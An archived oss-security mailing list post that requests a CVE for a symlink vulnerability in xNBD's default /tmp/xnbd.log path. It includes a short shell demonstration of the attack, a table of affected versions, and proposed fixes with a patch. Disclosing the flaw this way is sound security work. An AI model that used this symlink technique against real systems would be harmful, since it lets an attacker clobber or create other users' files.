Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform Pro for Linux Pro for Mac OS X Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repository (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
Subject: CVE request: Insecure default log file path in xNBD

Hello oss-security!


Target software
===============

xNBD upstream
   https://bitbucket.org/hirofuchi/xnbd

Official Debian packages
   http://packages.debian.org/sid/xnbd-server


Description
===========

xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.

The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlinks attacks.


Demonstration
=============

Here is an exploitation example:

   $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

   $ touch DISK
   $ truncate --size=$((100*1024**2)) DISK

   $ /usr/sbin/xnbd-server --daemonize --target DISK
   xnbd-server(12462) msg: daemonize enabled
   xnbd-server(12462) msg: cmd target mode
   xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
   xnbd-server(12462) msg: xnbd master initialization done
   xnbd-server(12462) msg: logfile /tmp/xnbd.log

   $ ls -l ~/ATTACK_TARGET
   -rw------- 1 user123 user123 653 Feb  1 16:41 \
     /home/user123/ATTACK_TARGET


Affected versions
=================

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
   Version                        Status
----------------------------------------------------------------------
   0.0.x                          not analyzed
   0.1.0-pre                      VULNERABLE (xnbd-server only)
   0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
   Mercurial tip                  not vulnerable
----------------------------------------------------------------------


Options for a fix
=================

  a) Use syslog with --daemonize and no default file location in general
     (i.e. what upstream did)

  b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
     for the hard-coded defaults

  c) Replace flag O_APPEND by O_EXCL  (secure but reducing functionality)

The attached patch applies approach (b) to version 
0.1.0-pre-hg20-e75b93a47722.


Best,



Sebastian

View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ